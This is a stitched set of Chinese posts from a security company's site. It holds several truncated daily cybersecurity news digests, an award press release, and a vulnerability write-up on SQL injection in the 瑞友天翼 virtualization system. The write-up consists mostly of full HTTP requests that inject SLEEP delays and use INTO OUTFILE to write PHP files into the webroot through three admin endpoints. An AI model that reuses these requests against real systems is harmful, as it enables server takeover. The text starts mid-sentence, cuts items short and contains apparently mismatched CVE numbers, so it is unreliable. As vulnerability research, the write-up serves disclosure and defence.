Stomping技术隐藏其真实代码。当受害者打开该Excel文件时，宏被执行，进而修改注册表、枚举当前窗口、设置持久性，并尝试从特定URL下载额外的恶意负载。此外，Orcinius木马还涉及监视键盘输入和激活下载。安全研究人员发布了针对此恶意软件的防 5、澳大利亚四大银行遭遇持续网络攻击威胁 https://thecyberexpress.com/national-australia-bank-warn-cyber-threats/ 澳大利亚国民银行近日发出警告，澳大利亚四大银行正面临持续的网络攻击威胁。这些攻击由各种威胁行为体发起，包括业余黑客、有组织的跨国犯罪集团，甚至包括国家支持的威胁行为体。这些攻击形式多样，包括恶意代码分发、安全漏洞利用和拒绝服务活动等。攻击目的是窃取客户敏感信息和资金。据估计，澳大利亚每年因网络诈骗损失高达30亿美元。澳大利亚银行业协会也承认了当前形势的严重性，并将其称为“诈骗战争”，同时呼吁客户保持警惕，以防止资金落入犯罪分子手中。 6、研究人员披露PelView Plus设备高危漏洞 https://www.microsoft.com/en-us/security/blog/2024/07/02/vulnerabilities-in-panelview-plus-devices-could-lead-to-remote-code-execution/ 近日，微软威胁情报团队披露了罗克韦尔自动化PanelView Plus设备中的两个关键漏洞。这些漏洞允许未经身份验证的远程攻击者执行代码（RCE）和拒绝服务（DoS），这些漏洞可能被远程攻击者利用来执行代码和造成服务中断。在2023年5月和7月微软向罗克韦尔自动化通报了这些漏洞，并在同年9月和10月获得了相应的安全补丁。本次 7、威胁行为者公开出售NPM账户接管漏洞 https://thecyberexpress.com/account-takeover-vulnerability/ 近日，一名名为Alderson1337的威胁行为体在BreachForums上公开出售针对npm账户的接管漏洞。并宣称该漏洞允许攻击者入侵特定组织员工的npm账户，并在软件包中注入难以检测的后门。为保持漏洞的机密性，威胁行为体选择私下交流而非公开披露PoC信息。npm作为JavaScript的关键包管理器，由GitHub的子公司npm, Inc.管理，其账户安全对全球开发者和组织至关重要。目前，npm Inc.尚未对此事发表官方回应，也未证实账户接管漏洞的存在。 8、Twilio旗下Authy应用遭入侵导致数千万用户数据泄露 https://www.twilio.com/en-us/changelog/Security_Alert_Authy_App_Android_iOS Twilio旗下双因素认证应用Authy遭遇数据泄露，数百万用户电话号码被泄露。攻击者利用Authy中的一个未授权端点，获取了与账户相关的敏感数据，包括数百万用户的手机号码。在7月1日发布的安全警报中，Twilio表示没有证据显示攻击者获得了对Twilio系统或其他敏感数据的访问权限。然而，出于安全考虑，建议用户更新至Android 25.1.0或iOS 26.1.0及以上版本的应用程序，并提高对潜在网络钓鱼和短信钓鱼攻击的警惕。 9、多国执法关闭了600台与网络犯罪有关的Cobalt Strike服务器 https://www.nationalcrimeagency.gov.uk/news/national-crime-agency-leads-international-operation-to-degrade-illegal-versions-of-cobalt-strike 全球警方在代号为MORPHEUS的行动中成功关闭了近600台与Cobalt Strike相关的网络犯罪服务器。这次协调的执法行动由英国国家犯罪局（NCA）领导，得到了27个国家的在线服务提供商的协助，以及多国执法部门的参与。Cobalt Strike是一款被广泛用于对手模拟和渗透测试的工具，但其破解版本被恶意行为体 10、巴西数据保护机构禁止Meta使用来自该国的数据训练AI模型 https://securityaffairs.com/165216/social-networks/brazil-data-protection-authority-banned-meta-ai.html 巴西数据保护机构暂时禁止 Meta 使用来自该国的数据来训练其人工智能。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Censys：仍有超过 38 万台主机引用恶意Polyfill域名 https://www.securityweek.com/over-380k-hosts-still-referencing-malicious-polyfill-domain-censys/ 攻击面管理公司 Censys 报告称，引用最近暂停的 polyfill.io 域的 JavaScript 脚本存在于超过 380,000 台暴露在互联网上的主机上。 2、英特尔称无需采取新的缓解措施来应对Indirector攻击 https://www.securityweek.com/intel-says-no-new-mitigations-required-for-indirector-cpu-attack/ 研究人员披露了一种名为 Indirector 的新型高精度分支目标注入攻击方法，但英特尔表示不需要采取新的缓解措施。 3、研究人员称，新勒索软件组织利用电话向受害者施压 https://therecord.media/ransomware-group-volcano-demon-lukalocker 研究人员发现了一个名为 Volcano Demon 的新勒索软件组织，该组织最近成功对制造业和物流行业的公司发动了两次攻击。这个勒索软件组织的有趣之处在于，它没有公开泄密网站，而是使用电话恐吓受害者组织的领导层并与他们协商付款。研究人员表示，这些电话来自身份不明的号码，通常带有威胁的语气。 4、报告发现网络安全已成为汽车行业最关注的问题 https://www.cybersecuritydive.com/news/cybersecurity-top-concern-auto-industry-rockwell-automation/720453/ 根据罗克韦尔自动化的一项调查，汽车和汽车供应制造商将网络安全列为他们最大的外部担忧。仅在 2023 年上半年，网络攻击就造成了 118 亿美元的损失。 5、Xbox 服务全球瘫痪，多个平台用户受影响 https://www.freebuf.com/news/405076.html 近日，Xbox Live 服务因重大故障而瘫痪，全球用户受到影响，无法登录 Xbox 账户和玩游戏。 6、Meta 的 "付费或同意 "数据模式违反欧盟法律 https://www.infosecurity-magazine.com/news/meta-pay-consent-data-breach/ 欧盟委员会的初步意见是，这家科技巨头的新做法不符合《数字市场法》（DMA）第 5（2）条的规定。该条款要求把关人在指定的核心平台服务和其他服务之间合并用户的个人数据时，必须征得用户的同意。如果用户拒绝同意，则应获得个性化程度较低但等效的替代服务。 7、利用云助手进行黑产攻击事件频发 https://www.secrss.com/articles/67624 微步情报局通过近期的威胁狩猎发现了多起利用具备“远控”功能的合法软件进行攻击的攻击事件，相关事件既包括真实的黑产攻击事件，也包括各类攻防演练活动相关的攻击事件。通过微步情报局的监测，相关被滥用的合法软件包括阿里云助手、长亭云助手、IP-Guard、山东固信、360云管理等软件。 8、日本动漫游戏巨头 Kadokawa 承认遭勒索攻击后数据泄露 https://therecord.media/japan-anime-giant-data-leak-ransomware 该公司在周六的一份声明中说，泄露的数据包括商业伙伴的信息，合同和其他文件，以及公司内部数据，如其子公司 Dwango 所有员工的个人信息，该公司运营着日本流行的视频共享网站 Niconico。 9、LockBit宣布攻击克罗地亚最大的医院 KBC-Zagreb https://www.anquanke.com/post/id/297636 上周四，克罗地亚萨格勒布大学医院中心宣布遭受网络攻击，不到一周时间，该中心就被 LockBit 勒索软件组织占领。 10、CDK Global网络攻击导致美国汽车销售陷入瘫痪 https://www.anquanke.com/post/id/297626 CDK Global 网络攻击导致美国汽车行业陷入瘫痪已近两周，许多汽车销售网点仍在艰难恢复正常。CDK Global 网络攻击给经销商造成了数百万美元的损失。据CNN报道，网络汽车公司表示，此次网络攻击使得经销商难以跟踪客户互动、订单和销售情况。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

最近网上公开了一些瑞友天翼应用虚拟化系统的 SQL 注入漏洞，经过挖掘发现，还存在一些后台 SQL 注入漏洞。 重点关注传入参数可控并且拼接到 SQL 语句中的代码。 getappicon 首先检测了登录状态，然后将通过 GET 获取到的参数 id 直接拼接到 SQL 语句中。 GET /hmrao.php?s=/Admin/getappicon/&id=1');SELECT+SLEEP(5)+AND('1 HTTP/1.1 Host: 192.168.222.145 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.222.145/hmrao.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0 Connection: close 我们打印出执行的 SQL 语句，发现成功闭合 SQL。 GET /hmrao.php?s=/Admin/getappicon/&id=1');select%20'<?php%20phpinfo();?>'%20into%20outfile%20%27C:\\Program%20Files%20(x86)\\RealFriend\\Rap%20Server\\WebRoot\\test1.php%27%23 HTTP/1.1 Host: 192.168.222.145 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.222.145/hmrao.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0 Connection: close 成功将文件写到根目录下。 ‍ useredit 首先检测了登录状态，然后将通过 GET 获取到的参数 id 直接拼接到 SQL 语句中。 我们看到这里检测登录状态的函数是 adminchecklogin 这里进行检测时会根据路由 sessId 来进行检测，所有需要将cookie 拼接在路由器上。 GET /hmrao.php?s=/Admin/useredit/sessId/c3gnn42nnfafaei5im0ti44tp2&uid=1');SELECT+SLEEP(5)%23 HTTP/1.1 Host: 192.168.222.145 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.222.145/hmrao.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0 Connection: close GET /hmrao.php?s=/Admin/useredit/sessId/c3gnn42nnfafaei5im0ti44tp2&uid=1');select%20'<?php%20phpinfo();?>'%20into%20outfile%20%27C:\\Program%20Files%20(x86)\\RealFriend\\Rap%20Server\\WebRoot\\test2.php%27%23 HTTP/1.1 Host: 192.168.222.145 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.222.145/hmrao.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0 Connection: close 成功将文件写到根目录下。 ‍ appedit 首先检测了登录状态，然后将通过 GET 获取到的参数 id 直接拼接到 SQL 语句中。 这里检测登录状态的函数同样也是 adminchecklogin 所以也需要将cookie 拼接在路由中。 GET /hmrao.php?s=/Admin/appedit/sessId/c3gnn42nnfafaei5im0ti44tp2&id=0');select+sleep(5)%23 HTTP/1.1 Host: 192.168.222.145 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.222.145/hmrao.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0 Connection: close GET /hmrao.php?s=/Admin/appedit/sessId/c3gnn42nnfafaei5im0ti44tp2&id=0');select%20'<?php%20phpinfo();?>'%20into%20outfile%20%27C:\\Program%20Files%20(x86)\\RealFriend\\Rap%20Server\\WebRoot\\test.php%27%23 HTTP/1.1 Host: 192.168.222.145 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.222.145/hmrao.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=c3gnn42nnfafaei5im0ti44tp2; think_language=zh-CN; UserAuthtype=0 Connection: close 成功将文件写到根目录下。 ‍

1、新型Indirector侧信道攻击威胁英特尔CPU安全 https://www.bleepingcomputer.com/news/security/latest-intel-cpus-impacted-by-new-indirector-side-channel-attack/ 研究人员发现现代英特尔CPU，包括第12代和第13代酷睿处理器，面临Indirector侧信道攻击的威胁。Indirector攻击的机制包括利用iBranchLocator识别分支索引和标签，英特尔已获悉此攻击风险并提出缓解措施，研究人员将在8月举行的USENIX安全研讨会上展示Indirector攻击，目前已经在GitHub上发布了相关概念验证代码和工具。 2、虚假IT网站借Windows漏洞传播Vidar恶意软件 https://www.bleepingcomputer.com/news/security/fake-it-support-sites-push-malicious-powershell-scripts-as-windows-fixes/ 近日，网络安全研究人员发现了一系列虚假IT支持网站，这些网站宣传所谓的“修复”方案，针对Windows更新中常见的0x80070643错误。这些所谓的“解决方案”实际上是恶意PowerShell脚本，一旦执行，就会在用户设备上安装Vidar信息窃取恶意软件。这些虚假网站通过已被劫持的YouTube频道进行推广，以增加其可信度。研究人员警告用户，应避免从不 3、谷歌修复了25 个 Android漏洞，包括严重的提权漏洞 https://www.securityweek.com/google-patches-25-android-flaws-including-critical-privilege-escalation-bug/ 谷歌已发布针对 Android 操作系统中 25 个已记录安全漏洞的补丁，其中包括框架组件中的一个严重漏洞。该严重漏洞被标记为 CVE-2024-31320，影响 Android 12 和 12L 版本，允许攻击者提升易受攻击的设备上权限。 4、CapraRAT间谍软件伪装成热门应用瞄准 Android 用户 https://siliconangle.com/2024/07/01/sentinellabs-uncovers-new-caprarat-spyware-targeting-android-users/ 上市网络安全公司SentinelOne Inc.的研究部门 SentinelLabs 今天发布了一份新报告 ，警告称 CapraRAT 间谍软件再次兴起，通过恶意 Android 应用程序针对手机游戏玩家和武器爱好者进行攻击。 5、近4000人在国际执法打击网络诈骗网络的行动中被捕 https://therecord.media/4000-arrested-in-global-cybercrime-scam-crackdown-interpol 国际执法部门6月27日表示，他们捣毁了几个国家的在线诈骗网络，逮捕了3900多名嫌疑人，并没收了2.57亿美元的非法资产。 6、Infosys McCamish称被LockBit 窃取了600万人数据 https://www.bleepingcomputer.com/news/security/infosys-mccamish-says-lockbit-stole-data-of-6-million-people/ Infosys McCamish Systems （IMS） 透露，今年早些时候曾遭受 LockBit 勒索软件攻击，窃取了超过 600 万人的敏感信息。 7、可获root权限，思科NX-OS 零日漏洞修复已发布 https://www.freebuf.com/news/404980.html 思科修补了 4 月份曝出的 NX-OS 零日漏洞，威胁攻击者可以利用该漏洞在受影响的交换机上以 root 身份，安装未知恶意软件。 8、韩国ERP供应商的更新系统遭破坏并爆发恶意软件 https://www.theregister.com/2024/07/02/korean_erp_backdoor_malware_attack/ 据韩国网络安全公司 AhnLab 称，一家韩国 ERP 供应商的产品更新服务器遭到攻击者入侵，攻击者利用该服务器分发恶意软件而不是合法更新。 9、Splunk修补了企业产品中的高严重性漏洞 https://www.securityweek.com/splunk-patches-high-severity-vulnerabilities-in-enterprise-product/ Splunk 周一宣布修补 Splunk Enterprise 和 Cloud Platform 中的 16 个漏洞，其中包括 6 个高严重程度的漏洞。 10、强对抗的 SquidLoader 针对中国企业发起攻击 https://www.freebuf.com/articles/network/404478.html 研究人员近期发现了一种高对抗强度的 Loader，其通过钓鱼邮件附件传递给受害者。根据恶意软件所具备的引诱和规避行为，研究人员将其命名为 SquidLoader。SquidLoader 最早在 2024 年 4 月下旬被发现，但研究人员认为其至少已经活跃了一个月以上。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

导语：蚁景科技在“双城铸盾”中山·江门网络安全实战攻防演练中表现突出，获”三等奖“殊荣。 近期，首届“双城铸盾”中山·江门网络安全实战攻防演练在中山启动，此次演练由中山与江门两地市委网信办、市委机要保密局、市政务服务数据管理局、市公安局联合举办，旨在提升两地的网络安全防护能力，强化网络安全实战人才培养。 本次演练组织了来自国内网络安全领域知名企业、研究所和高校的超70支专业攻击队伍参加，以中山、江门两市的600多个政务信息系统和重点领域企事业单位信息系统为靶标，开展为期5天的实战攻防。 在此次实战攻防演练中，蚁景科技派出技术能力过硬的攻击队全力投入，成功挖掘出多个重要的信息系统漏洞，展现了雄厚的网络安全技术实力。最终，蚁景科技凭借出色的渗透攻击策略和专业的实战技术能力，以总分2632分的成绩脱颖而出，荣获此次演练赛的“三等奖”。 此次“双城铸盾”网络安全实战攻防演练为蚁景科技提供了一个展示实力的舞台，同时也为公司积累了宝贵的实战演练经验。 蚁景科技作为网络安全领域的践行者，一直专注于网络安全实战人才的培养和技术研发。不仅提供前沿的网络安全技术培训，还注重实战能力的锻炼，确保学员能够真正掌握网络安全的核心技能。通过多年的网络安全实战人才培养和技术研发，蚁景科技已经积累了丰富的经验和资源。未来，将继续致力于网络安全事业的发展，为社会的网络安全贡献力量。

1、OpenSSH发布安全更新及未来弃用DSA密钥计划 https://www.openssh.com/releasenotes.html OpenSSH项目团队7月1日发布了OpenSSH 9.8版本，其中修复了两个关键安全问题，包括一个影响sshd服务的严重漏洞（CVE-2021-32604）和一个逻辑错误ObscureKeystrokeTiming。此外，OpenSSH宣布计划于2025年初完全弃用DSA密钥，因其安全性已不再符合当前标准。新版本还引入了多项功能改进和错误修复，提高了SSH协议的安全性和用户体验。用户被建议尽快更新至最新版本，以确保其系统的安全性。 2、新型勒索软件Brain Cipher攻击印尼数据中心 https://www.bleepingcomputer.com/news/security/meet-brain-cipher-the-new-ransomware-behind-indonesia-data-center-attack/ 一款名为Brain Cipher的勒索软件对印度尼西亚的国家数据中心发起攻击，造成移民服务、护照管制等关键政府服务中断。该勒索软件团伙索要高达800万美元的门罗币作为解密赎金，并威胁若不支付将公开被盗数据。Brain Cipher基于泄露的LockBit 3.0源代码，但进行了定制化修改，包括加密文件名和创建特定的勒索信。此外，该团伙还启动了数据泄露网站 3、UAC-0184组织在DLL侧载分发XWorm远程访问木马 https://cyble.com/blog/uac-0184-abuses-python-in-dll-sideloading-for-xworm-distribution/ 研究人员发现一个名为UAC-0184的威胁行为体利用一种新的技术手段，通过DLL侧载和Python相关文件，针对乌克兰发动了恶意软件攻击活动。该活动使用了XWorm远程访问木马（RAT），通过伪装的诱饵文件和精心设计的PowerShell脚本进行传播。攻击者可能通过网络钓鱼或垃圾邮件传播带有ZIP附件的恶意软件。研究人员警告一旦设备被XWorm RAT感染，攻击者将获得远程访问权限，可能用于数据盗窃、DDoS攻击等恶 4、类似Mirai的僵尸网络利用漏洞攻击Zyxel NAS设备 https://hackread.com/mirai-botnet-zyxel-nas-devices-europe-ddos-attacks/ 研究人员近期揭露了一个与Mirai僵尸网络相似的新僵尸网络，它正针对两款已停产的Zyxel网络附加存储（NAS）设备发起攻击。2024年3月，漏洞研究部门已向Zyxel通报了NAS端点的三个严重安全漏洞。目前，这个僵尸网络正利用这些漏洞，将易受攻击的设备纳入其控制之下，这些设备一旦被攻陷，可能被用于对关键基础设施和企业进行DDoS攻击。研究人员建议Zyxel NAS的用户识别自己的设备型号和版本，对于存在漏洞的设备，应立即下载并安装最新的安全补丁， 5、MerkSpy间谍软件利微软Office漏洞渗透系统 https://www.fortinet.com/blog/threat-research/merkspy-exploiting-cve-2021-40444-to-infiltrate-systems 2024年6月27日，安全研究人员揭露了一起攻击活动，该活动利用了Microsoft Office中的CVE-2021-4044漏洞。攻击者通过伪装的Word文档传播MerkSpy间谍软件，该软件能够秘密监控用户行为、捕获敏感信息，并在受感染的系统上建立持久性。攻击流程包括下载恶意HTML文件、执行shellcode、解码注入MerkSpy间谍软件，以及将窃取的数据上传到远程服务器。研究人员 6、数百万 OpenSSH 服务器面临regreSSHion攻击 https://www.securityweek.com/millions-of-openssh-servers-potentially-vulnerable-to-remote-regresshion-attack/ 由于被追踪为 regreSSHion 和 CVE-2024-6387 的漏洞，数百万 OpenSSH 服务器可能容易受到未经身份验证的远程代码执行。 7、Google为新的KVM漏洞赏金计划提供最高25万美元奖励 https://www.securityweek.com/google-offering-250000-for-full-vm-escape-in-new-kvm-bug-bounty-program/ 谷歌宣布了一项新的漏洞赏金计划，对在基于内核的虚拟机 (KVM) 管理程序中发现的漏洞将提供丰厚的奖励。完整的虚拟机逃逸最高可获得 25 万美元的奖励。任意内存写入漏洞可获得 10 万美元，任意内存读取漏洞或相对内存写入漏洞可获得 5 万美元。DoS 攻击最高可获得 2 万美元，相对内存读取漏洞最高可获得 1 万美元。 8、影响大量路由器，Juniper曝严重的“身份验证”漏洞 https://www.freebuf.com/news/404900.html 近日，Juniper Networks被曝存在一个极其严重的“身份验证”漏洞，对Session Smart 路由器（SSR）、Session Smart Conductor和WAN Assurance 路由器等产品造成比较明显的影响。目前，Juniper已紧急发布了相应的漏洞补丁，用户可及时进行系统更新。 9、CocoaPods中的严重漏洞可导致数百万苹果应用遭供应链攻击 https://thehackernews.com/2024/07/critical-flaws-in-cocoapods-expose-ios.html Swift 和 Objective-C Cocoa 项目的CocoaPods依赖管理器中发现了三个安全漏洞，可能被利用来发起软件供应链攻击，使下游客户面临严重风险。EVA 信息安全研究人员 Reef Spektor 和 Eran Vaknin在今天发布的一份报告中表示，这些漏洞允许“任何恶意行为者声称拥有数千个无人认领的 pod，并将恶意代码插入许多最受欢迎的 iOS 和 macOS 应用程序中”。 10、报告称75% 的新漏洞在 19 天内被利用，每周600个新漏洞 https://www.helpnetsecurity.com/2024/06/27/nvd-vulnerabilities/ 去年，Skybox Security 报告称，新漏洞超过 30,000 个，平均每 17 分钟就会出现一个新漏洞。这相当于每周出现约 600 个新漏洞。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。